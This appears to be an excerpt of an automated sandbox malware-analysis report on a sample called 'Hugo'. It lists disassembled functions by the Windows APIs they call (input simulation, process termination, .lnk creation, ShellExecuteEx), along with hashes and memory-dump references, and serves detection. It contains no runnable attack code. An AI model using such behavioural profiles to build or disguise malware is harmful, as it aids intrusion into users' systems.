Opcode ID: d047428559e780353de45b7a5ab2833445ef757a5fbd79a79e396fb70bd3119c
Instruction ID: 659c1b78cad3fa612cd75071ea5de7d28cbd52774c46aa584e7bfcd4d6a258d0
Opcode Fuzzy Hash: d047428559e780353de45b7a5ab2833445ef757a5fbd79a79e396fb70bd3119c
Instruction Fuzzy Hash: D941CF71508344AFD710DF28DCC4FAA7BA8FB46334F040669FA558A2A2D7309984FB62

Function 00F81196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F811B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F811EE
EnterCriticalSection.KERNEL32(?), ref: 00F8120A
LeaveCriticalSection.KERNEL32(?), ref: 00F81283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F8129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F812C8

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ff33f3bc9b01c099abcfd5fd983c5d7473ae2c403c12ca0141e7f243b4c1d5c4
Instruction ID: ac32d96c11f34b08812807b049f5a494a31b5d6f89a5e594a478cd9560aa050d
Opcode Fuzzy Hash: ff33f3bc9b01c099abcfd5fd983c5d7473ae2c403c12ca0141e7f243b4c1d5c4
Instruction Fuzzy Hash: 79417C71900205EFDF04EF54DC85AAAB7B8FF45720F1441A5ED009B296DB34DE51EBA0

Function 00FA8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F6FBEF,00000000,?,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00FA8CA7
EnableWindow.USER32(?,00000000), ref: 00FA8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FA8D2C
ShowWindow.USER32(?,00000004), ref: 00FA8D40
EnableWindow.USER32(?,00000001), ref: 00FA8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FA8D8A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1c6f5d6fe5237fcac21df16023ea021c5d07354e00fb684f86686936dbad8945
Instruction ID: 045730c3da41d02b161c0197f8a7aa0673d35d8c10687e6b1e4bfb276be2f2f6
Opcode Fuzzy Hash: 1c6f5d6fe5237fcac21df16023ea021c5d07354e00fb684f86686936dbad8945
Instruction Fuzzy Hash: 6C41B6B0A01248AFDB25DF24C885BA57BF1FB47364F1440A9E5094F2A3DBB16846EF60

Function 00F92D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00F92D45

Part of subcall function 00F8EF33: GetWindowRect.USER32(?,?), ref: 00F8EF4B

GetDesktopWindow.USER32 ref: 00F92D6F
GetWindowRect.USER32(00000000), ref: 00F92D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F92DB2
GetCursorPos.USER32(?), ref: 00F92DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F92E3C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 921312b3b116de9d6c625c48d06f1397932a49e8fc1fbffd28d07fa2f118eae6
Instruction ID: 4f4409448c4cd4a3071c4a5783126f6aaca18196be2c4733f1c8ae91f480072b
Opcode Fuzzy Hash: 921312b3b116de9d6c625c48d06f1397932a49e8fc1fbffd28d07fa2f118eae6
Instruction Fuzzy Hash: 4531D072905315AFDB20DF18CC49B9BB7A9FF85314F00091AF489A7291DB30E909DB92

Function 00F755E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F755F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F75616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F7564E
_wcslen.LIBCMT ref: 00F7566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F75674
_wcsstr.LIBVCRUNTIME ref: 00F7567E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: fd5ac322de1fa6f5ef4a488f9af2ccd757ba329054305b109f6f073b8e1c9859
Instruction ID: dc378ef36b2985a8898ae8a368b3f02b6421b15df42c1bb1e68003e63756ed95
Opcode Fuzzy Hash: fd5ac322de1fa6f5ef4a488f9af2ccd757ba329054305b109f6f073b8e1c9859
Instruction Fuzzy Hash: 0F2123726046047BEB156B28DC49E7F7BA8DF49B70F14802BF80ACA191EFA5DC41B661

Function 00F86263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871

_wcslen.LIBCMT ref: 00F862C0
CoInitialize.OLE32(00000000), ref: 00F863DA
CoCreateInstance.OLE32(00FB0CC4,00000000,00000001,00FB0B34,?), ref: 00F863F3
CoUninitialize.OLE32 ref: 00F86411

Strings

.lnk, xrefs: 00F862BB, 00F86306, 00F863CA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 715f45dddf1e510f692363ea1fcbd6d089ec6cae3be366510fb78a77c6a43e92
Instruction ID: 70c7353ce345fc80af9131bc26c353a4e8ebf9f332050c6d1eb48e98858ca1db
Opcode Fuzzy Hash: 715f45dddf1e510f692363ea1fcbd6d089ec6cae3be366510fb78a77c6a43e92
Instruction Fuzzy Hash: 3AD15171A042019FC714EF24C884AAABBE5FF89724F14885DF889DB361CB35EC45DB92

Function 00FA86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00FA8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FA8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FA877D
GetSystemMetrics.USER32(00000004), ref: 00FA87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F8C1F2,00000000), ref: 00FA87C6

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

GetSystemMetrics.USER32(00000004), ref: 00FA87B1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: c25fe49335e69fd03b1379a32282f16c35c79e68098e8d4c12cea67172f41b24
Instruction ID: c955953cf1aa69fcd50d31044e0af63143e6e416549505f439e4070fa13fed55
Opcode Fuzzy Hash: c25fe49335e69fd03b1379a32282f16c35c79e68098e8d4c12cea67172f41b24
Instruction Fuzzy Hash: C72190F1A102459FCB149F38CC48A6A3BA5EB463B5F244629F927C65E0EEB08851EB10

Function 00F336F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F336E9,00F33355), ref: 00F33700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F3370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F33727
SetLastError.KERNEL32(00000000,?,00F336E9,00F33355), ref: 00F33779

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6c613bd10b56982e618c6b5e41e4f4ff4806cb6161f43a4fc5e159b983883dc4
Instruction ID: 7ce81f6e64afbaf484555f8af8b98bf2d1eb2952d2fda9e30f4450947256e0a7
Opcode Fuzzy Hash: 6c613bd10b56982e618c6b5e41e4f4ff4806cb6161f43a4fc5e159b983883dc4
Instruction Fuzzy Hash: 7101D4B7A5E3156EAA24A7B4BCCA76A3F95EB45772F20022AF510811F0EF559D027240

Function 00F430E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00F34D53,00000000,?,?,00F368E2,?,?,00000000), ref: 00F430EB
_free.LIBCMT ref: 00F4311E
_free.LIBCMT ref: 00F43146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00F43153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00F4315F
_abort.LIBCMT ref: 00F43165

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3f49217d830e70d23e634a1837165382f2434d4e87840ca0edb2f593ffb4544e
Instruction ID: 879fd82b3ce938d708dd2a5c530303a6a81f90e9d763caaa37cf6cc5e233a176
Opcode Fuzzy Hash: 3f49217d830e70d23e634a1837165382f2434d4e87840ca0edb2f593ffb4544e
Instruction Fuzzy Hash: 20F0C876D4460526E6127735AC46B5E3E7A9FC1770B250425FE25D22E1EE288A027161

Function 00FA9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00F11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F11F87
Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11F96
Part of subcall function 00F11F2D: BeginPath.GDI32(?), ref: 00F11FAD
Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FA94AA
LineTo.GDI32(?,00000003,00000000), ref: 00FA94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FA94CC
LineTo.GDI32(?,00000000,00000003), ref: 00FA94DC
EndPath.GDI32(?), ref: 00FA94EC
StrokePath.GDI32(?), ref: 00FA94FC

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: aa64e0fbcd405d191382f55ed5af5dbe642010df1727124fcf353d370cf7e74c
Instruction ID: e40971369fbdad94acf60cb2254ff41ef3d73c26c50947375b8350f20b41f515
Opcode Fuzzy Hash: aa64e0fbcd405d191382f55ed5af5dbe642010df1727124fcf353d370cf7e74c
Instruction Fuzzy Hash: 40111BB200014DBFEF029F90DC89E9A7F6DEF09360F04C021BA1A4A1A1D7719D56EBA0

Function 00F75B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F75B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F75B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F75B94
ReleaseDC.USER32(00000000,00000000), ref: 00F75B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F75BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F75BC5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 79d022d1f2be042c333030e935484a7f69f7b49ae6cc018205297dec75fe6c3e
Instruction ID: fc91f6df71cbe1f952c49378f13ae662702e5b05d52e88cdebbc0d80d3c2352d
Opcode Fuzzy Hash: 79d022d1f2be042c333030e935484a7f69f7b49ae6cc018205297dec75fe6c3e
Instruction Fuzzy Hash: 240167B5E00718BBEB109FA59C49F5E7F78EF49751F008066FA09A7280D6709C01DF91

Function 00F1327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F132AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00F132B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F132C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F132CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00F132D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F132DD

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 547dba7ce31a4efe8b579993bff08915d64566c8a8d8b65f26e11422926d02a4
Instruction ID: ff30aab32527e594c6817ac378d23f72eace5e6ef7c569bea0a7375cc1acbafe
Opcode Fuzzy Hash: 547dba7ce31a4efe8b579993bff08915d64566c8a8d8b65f26e11422926d02a4
Instruction Fuzzy Hash: 570167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00F7F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F7F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F7F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00F7F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F48C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 56aa4d24b3c44cb44429864121481ae60d9875d0c96721579804873c3b8623d2
Instruction ID: 7b90630ca564c3e9461158ea4209eb46b8ca8ac384febbdf6ed1a0b6698c3b26
Opcode Fuzzy Hash: 56aa4d24b3c44cb44429864121481ae60d9875d0c96721579804873c3b8623d2
Instruction Fuzzy Hash: 0CF03AB224115CBBE7215B629C0EEEF3B7CEFC7B11F000059F60691190DBA06A02E6B5

Function 00F534D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00F534EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00F53506
GetWindowDC.USER32(?), ref: 00F53512
GetPixel.GDI32(00000000,?,?), ref: 00F53521
ReleaseDC.USER32(?,00000000), ref: 00F53533
GetSysColor.USER32(00000005), ref: 00F5354D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: c4aecc27b232bc4cde1bd1d65f1a1c319eb96f276f34fd2210b223f7089df782
Instruction ID: fd281ac3a4bd7de7bfd610b342d1e5a33dd58c6bebec58e5c2171b09532552e3
Opcode Fuzzy Hash: c4aecc27b232bc4cde1bd1d65f1a1c319eb96f276f34fd2210b223f7089df782
Instruction Fuzzy Hash: 88016DB1900109EFDB505FA4DC08FE97BB5FF05321F550160FA2AA25A0DB311E91BF10

Function 00F721C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F721CC
UnloadUserProfile.USERENV(?,?), ref: 00F721D8
CloseHandle.KERNEL32(?), ref: 00F721E1
CloseHandle.KERNEL32(?), ref: 00F721E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00F721F2
HeapFree.KERNEL32(00000000), ref: 00F721F9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5aec6b78a2e7015668f1d30bfe4b9f6dc279f14319d1e327aa9141ac956ad76b
Instruction ID: be7028fe957eaf0a077711b1617cfbffa4dedc4ec6340d1d83508d6689b5c36d
Opcode Fuzzy Hash: 5aec6b78a2e7015668f1d30bfe4b9f6dc279f14319d1e327aa9141ac956ad76b
Instruction Fuzzy Hash: 05E09AB6104509BFEB011FA5EC0DD4ABF79FF4A722B504625F22682870CB329461EF51

Function 00F7CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7CF99
_wcslen.LIBCMT ref: 00F7CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F7D075

Strings

0, xrefs: 00F7CF5A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 91d4db5e01dbe36a83b851d3436164a7403dc99877bd77b53d6823296868be9d
Instruction ID: 6aa23ae46fe1cc0c16d6ffc78e584f8f832f85a9d4fbac4413fe7a41c452e4e0
Opcode Fuzzy Hash: 91d4db5e01dbe36a83b851d3436164a7403dc99877bd77b53d6823296868be9d
Instruction Fuzzy Hash: B151E072A043009FD714AE28CC45BAFB7F8AF85324F448A2EF999D3191DB74C945A793

Function 00F9B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00F9B903

Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF

GetProcessId.KERNEL32(00000000), ref: 00F9B998
CloseHandle.KERNEL32(00000000), ref: 00F9B9C7

Strings

<, xrefs: 00F9B8CB
@, xrefs: 00F9B8D2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: bf9df756c22046cada9880ada31d94ce6f52763708d73954779d8e82181fd8d7
Instruction ID: db7ef4d1cf1cb7874aecf5fac03df693cca4a61f26f34eae9c70f8bf9fa117cb
